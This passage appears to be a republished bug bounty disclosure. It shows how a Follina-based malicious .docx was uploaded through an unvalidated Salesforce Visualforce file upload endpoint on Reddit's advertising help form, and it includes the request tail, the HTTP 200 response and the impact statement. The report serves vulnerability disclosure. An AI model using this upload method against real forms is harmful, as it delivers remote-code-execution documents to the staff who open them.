Data.docx”,”5005c000017FCu8AAG”,”118.70.7.113″],”type”:”rpc”,”tid”:3,”ctx”:{“csrf”:”VmpFPSxNakF5TWkwd05pMHlNMVF3T0Rvek1qb3lOQzQ0TURCYSxPeVQ1SlZBcnRoajJZQlJFS1c3QVlvLE5HVXhPRGN6″,”vid”:”0661J000003FS4V”,”ns”:””,”ver”:41}}
“`

Here the data parameter contains the base64 encoded version of my clickme.docx file, which is based on the critical Follina vulnerability {F1780963}. This vulnerability can become a [zero click exploit](https://innovatecybersecurity.com/security-threat-advisory/follina-zero-day-allows-zero-click-rce-from-office-docs/).

5. Response returns 200, indicated that there is no existing server side check for filetype and the file was uploaded successfully:
“`http
HTTP/1.1 200 OK
Date: Mon, 20 Jun 2022 08:41:53 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Referrer-Policy: origin-when-cross-origin
Cache-Control: no-cache,must-revalidate,max-age=0,no-store,private
Content-Type: application/json;charset=UTF-8
X-Powered-By: Salesforce.com Visualforce
Vary: Accept-Encoding
Connection: close
Content-Length: 142

[{“statusCode”:200,”type”:”rpc”,”tid”:3,”ref”:false,”action”:”AdvertisingHelpController”,”method”:”uploadFile”,”result”:”00P5c00001leROKEA2″}]
“`

## Impact

Attacker can send malicious files to whoever handles the form behind https://reddit.secure.force.com/adhelpRead More

Back to Main

Subscribe for the latest news: